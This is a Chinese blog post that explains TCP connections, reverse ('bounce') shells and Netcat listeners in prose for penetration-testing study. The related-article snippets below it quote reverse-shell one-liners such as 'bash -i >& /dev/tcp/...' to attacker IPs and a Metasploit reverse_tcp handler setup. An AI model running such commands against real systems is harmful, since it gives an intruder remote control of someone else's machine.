TCP连接与反弹技术

于 2024-02-08 21:28:34 发布
阅读量496 收藏 9
点赞数 8
文章标签: 笔记 网络安全 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43049833/article/details/136082648
版权

TCP连接通常用于建立网络通信,而反弹技术是一种常用于渗透测试和远程控制的网络安全技术。

首先,TCP(Transmission Control Protocol)即传输控制协议,是一种面向连接的、可靠的、基于字节流的传输层通信协议。在TCP/IP协议中,TCP提供数据传输过程中的连接建立、数据包排序和错误恢复等机制。

其次,反弹技术,也被称为反向连接或反弹shell,是攻击者在被害主机上执行的命令能够通过网络送回到攻击者机器上的一种技术。这种技术允许攻击者绕过防火墙和NAT的限制,从内部网络发起一个连接到外部的监听端口,从而绕过传统的入站连接限制。

此外,Netcat是一个多功能的网络工具,它可以用于创建TCP或UDP连接,以及进行端口扫描和数据传输。在反弹技术中,Netcat可以用来在攻击者的机器上监听特定端口,等待从受害者机器上发出的连接请求,一旦连接建立,就可以进行命令执行和数据传输。

总的来说,反弹shell的基础操作包括在攻击者的机器上设置一个监听端口,然后在受害者机器上使用特定的命令将标准输入输出重定向到该端口,从而实现远程控制。这些操作通常涉及到文件描述符的操作,如stdin(标准输入)、stdout(标准输出)和stderr(标准错误输出)。

Blossom_.
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
易语言反弹连接源码-易语言
06-13
反弹连接(Reverse Connection)是一种网络安全技术,常用于穿透防火墙或者在客户端与服务器之间建立连接的一种方法。在这种连接方式中,客户端主动发起连接请求到服务器指定的端口,而不是传统的服务器主动连接到...
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 1847
powershell反弹shell常见方式 文章目录正向连接和反向连接反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接反弹连接) PowerShell的配置 常见的反弹Shell 总结
反弹连接基础
qq_45455136的博客
03-11 5048
反弹连接反弹连接适应情况常见端口监听方式建立反弹连接方式反弹连接流程 反弹连接适应情况 没有安装HTTP Server或找不到网站目录 内网,私有IP IP动态变化 6379端口不允许入方向 一句话木马被删除 常见端口监听方式 netcat:nc -lvp 7777 msf: msfconsole use exploit/multi/handler set payload php/meterpreter/reverse_tcp set lhost 192.168.37.130 set lport 77
反弹连接vlunhub靶机prinme1
m0_57379855的博客
09-25 469
2021-9-3 通过ip获取root权限漏洞靶机下载扫描局域网内的C段主机扫描端口获得运行的服务扫描目录获得关键信息fuzz获得正确的参数wordpress漏洞利用msfvenom生成反弹shellmsfconsole监听利用Ubuntu内核提权渗透测试的流程与技术 漏洞靶机下载 提供靶机的镜像平台链接 https://www.vulnhub.com/ 该平台有非常多的漏洞靶机镜像 今天测试的靶机链接为 https://www.vulnhub.com/entry/prime-1,358/ 点击下载,直接
反弹shell的正向连接和反向连接
最新发布
qq_44833342的博客
05-29 378
攻击者通过该连接获得对目标计算机的控制权。在正向连接中,攻击者需要知道目标计算机的IP地址和端口号,通过这些信息建立连接。而在反向连接中,目标计算机会向攻击者的计算机发起连接请求,攻击者只需要监听该请求即可建立连接。因此,反弹shell的反向连接更难被防御和检测,也更容易在网络中隐藏攻击者的身份。反弹shell是一种攻击技术,可以在未经授权的情况下远程控制目标计算机。正向连接是攻击者与目标计算机之间建立的连接,反向连接是目标计算机与攻击者之间建立的连接,攻击者通过该连接发送命令来控制目标计算机。
PHP后门反弹连接DVWA
m0_57379855的博客
03-31 3270
PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息 环境准备 操作系统准备 kali : 192.168.202.133 win10:192.168.202.139 DVWA靶场准备 DVWA下载 注意:配置DVWA环境 准备PHP7.0以上,和 Nginx环境 设置网站 配置数据库密码 与数据库设置保持一致 metasploit配置监控及攻击载荷 配置监控 使用handle
易语言-客户组件和服务器组件实现反弹连接
06-29
在IT行业中,网络通信是至关重要的一个领域,而“反弹连接”是一种特殊的网络连接方式,常见于客户端与服务器之间的通信,特别是在网络安全和渗透测试中。本文将深入探讨易语言环境下,如何利用客户组件和服务器组件...
Linux下NC反弹shell命令(推荐)
09-15
这条命令创建了一个交互式的Shell,并将其输出和输入重定向到到TCP连接上,连接的目标是IP地址10.0.0.1的8080端口。 除了`bash`,还有其他编程语言可以实现类似的功能,例如: - **Perl**: ```perl perl -e '...
反弹shell1
08-03
- 使用Bash命令,如`bash -i >& /dev/tcp/10.10.10.11/443 0>&1`,将Shell输出重定向到TCP连接。 - 使用`lua`脚本,创建TCP连接并执行命令。 3. **UDP反弹Shell** UDP反弹Shell与TCP类似,但使用UDP协议。攻击者...
好用的cmdshell反弹工具
06-19
1. **反弹连接**:与直接连接不同,反弹连接是让目标主机(服务器端)主动连接到攻击者的主机(客户端)。这种方法常用于绕过防火墙的限制,因为防火墙通常只阻止外向连接,而允许内向连接进入。 2. **命令行接口...
反弹连接后门反弹连接后门
06-25
反弹连接后门反弹连接后门反弹连接后门反弹连接后门
Redis未授权访问漏洞之反弹连接,SSH Key免密登陆,Webshell提权
qq_60115503的博客
05-10 797
Redis简介 REmote DIctionary Server(Redis)是一个由Salvatore Sanfilippo写的key-value存储系统,是跨平台的非关系型数据库(端口:6379) 存储缓存用的数据 需要高速读/写的场合使用它快速读/写 外网Redis配置 找到redis中的redis.cof文件并打开: 修改protectd-mode为no 将#bind 127.0.0.1修改为bind 127.0.0.1 修改daemonize属...
Mysql数据库反弹端口连接提权_MYSQL提权总结
weixin_39692045的博客
01-20 294
最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了。关于mysql提权的方法也就那么几种,希望也能帮到各位小伙伴们。一、利用mof提权前段时间国外Kingcope大牛发布了mysql远程提权0day(MySQL Windows Remote System Level Exploit...
反弹端口原理与HTTP隧道技术
天元喜羊羊的博客
08-20 1538
http://blog.163.com/feiqiu_13/blog/static/16870088920108123110438/ 现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网
Web渗透中的反弹Shell与端口转发的奇淫技巧
大方子
10-02 9556
奇淫技巧 0x00 前言 在做渗透测试时,遇到linux服务器,直观想到反弹shell到本地进行溢出等提权尝试,⽽而其中涉及到的反弹/转发/代理的种种方式,就在此文做一简单小结. 0x01 反弹shell 1) Bash 部分linux发行版中的Bash可以直接反弹一个shell到指定ip端口   bash -i >& /dev/tcp/x.x.x.x/2333 0&g...
反弹连接vulnhub靶场breach1
m0_57379855的博客
03-10 684
vulnhub靶场breach1靶场环境配置靶机网络工具准备端口扫描信息收集指纹识别CMS后台信息收集解密HTTPS流量Tomcat后台利用Linux提权 靶场环境 https://www.vulnhub.com/ 配置靶机网络 工具准备 准备一个kali burpsuite wireshark CTF编码工具 kali反弹 192.168.110.128 breach1 192.168.110.140 kali攻击 192.168.202.129 端口扫描信息收集 nmap -T4 -A -v 19
反弹连接技术
weixin_30341745的博客
11-28 1127
应用 现在的远程控制软件很流行使用反弹连接技术反弹技术的诞生,是为了解决传统的远程控制软件不能访问装有防火墙以及不能控制局域网内部的远程计算机。 域名反弹连接的原理很简单 编辑本段 服务端程序运行后,主动连接一个网络域名或IP地址,而本地用户通过客户端程序及时将电脑当前的IP地址及打开的端口更新到网络域名,这样服务端程序就可以成功连接到客户端,从而完成连接。因此通过反弹连接技术就可以在互联网上...
nc——制作后门连接反弹shell连接的使用
1stPeak's Blog
04-18 3565
一、nc参数 -g<网关> 设置路由器跃程通信网关,最多可设置8个 -G<指向器数目> 设置来源路由指向器,其数值为4的倍数 -h 在线帮助 -i<延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口 -l 使用监听模式,管控传入的资料 -n 直接使用IP地址,而不通过域名服务器。 -o<输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值